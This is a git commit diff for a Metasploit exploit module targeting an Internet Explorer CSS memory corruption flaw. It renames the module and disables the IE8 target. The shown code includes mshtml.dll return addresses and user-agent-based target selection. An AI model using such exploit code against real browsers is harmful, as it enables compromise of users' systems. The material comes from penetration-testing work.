switch title, comment out IE8 target for now

git-svn-id: file:///home/svn/framework3/trunk@10963 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-11-09 23:12:48 +00:00
parent 9e8a567dd3
commit 61e5d00722
1 changed files with 11 additions and 2 deletions

View File

@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer CSS Tags Memory Corruption',
'Name' => 'Internet Explorer CSS SetUserClip Memory Corruption',
'Description' => %q{
Thie module exploits a memory corruption vulenrability within Microsoft's
HTML engine (mshtml). When parsing an HTML page containing a specially
@ -106,11 +106,18 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
#
# Although IE8 is affected, we don't currently have a working target for it.
#
=begin
[ 'Internet Explorer 8 on Windows 7',
{
'Ret' => 0x7a6902d7, # mshtml.dll 8.00.7600.16385 @ 0x68e40000
#'Ret' => 0x396392db, # mshtml.dll 8.0.7600.16671 @ 0x62f90000
'Ret' => 0x39696cd8, # mshtml.dll 8.0.7600.16671 @ 0x694e0000
#'Ret' => 0x7a6902d7, # mshtml.dll 8.00.7600.16385 @ 0x68e40000
}
]
=end
],
'DisclosureDate' => 'Nov 3 2010',
'DefaultTarget' => 0))
@ -125,8 +132,10 @@ class Metasploit3 < Msf::Exploit::Remote
mytarget = targets[2] # IE6 on NT, 2000, XP and 2003
elsif agent =~ /MSIE 7\.0/
mytarget = targets[3] # IE7 on XP and 2003
=begin
elsif agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 6\.1/
mytarget = targets[4] # IE8 on Windows 7
=end
else
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end